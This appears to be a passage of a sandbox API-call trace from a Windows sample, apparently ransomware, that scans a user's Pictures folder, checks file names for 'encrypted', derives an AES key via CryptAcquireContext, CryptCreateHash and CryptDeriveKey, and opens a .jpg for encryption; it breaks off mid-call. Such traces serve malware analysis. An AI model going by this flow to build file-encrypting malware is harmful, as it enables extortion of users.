[0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fKs-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ks-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mGDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dt6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pjw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZFzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FzFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zFoo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Foo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oo26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="26_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_z1.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.084] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.084] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.084] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.084] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.084] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.084] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.084] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.084] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.084] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304524a0, ftCreationTime.dwHighDateTime=0x1d5bcc3, ftLastAccessTime.dwLowDateTime=0x6caaa870, ftLastAccessTime.dwHighDateTime=0x1d5be12, ftLastWriteTime.dwLowDateTime=0x6caaa870, ftLastWriteTime.dwHighDateTime=0x1d5be12, nFileSizeHigh=0x0, nFileSizeLow=0xdda0, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ZFzFoo26_z1.jpg", cAlternateFileName="ZFZFOO~1.JPG")) returned 0x7c2100 [0040.084] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.085] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.085] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.085] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.086] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.086] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.086] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.086] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.086] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.086] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.086] CryptHashData (hHash=0x7c2240, pbData=0x7c9798, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.087] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.087] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.087] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0040.087] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.087] CryptDestroyHash (hHash=0x7c2240) returned 1 [0040.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\zfzfoo26_z1.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.087] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.087] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: 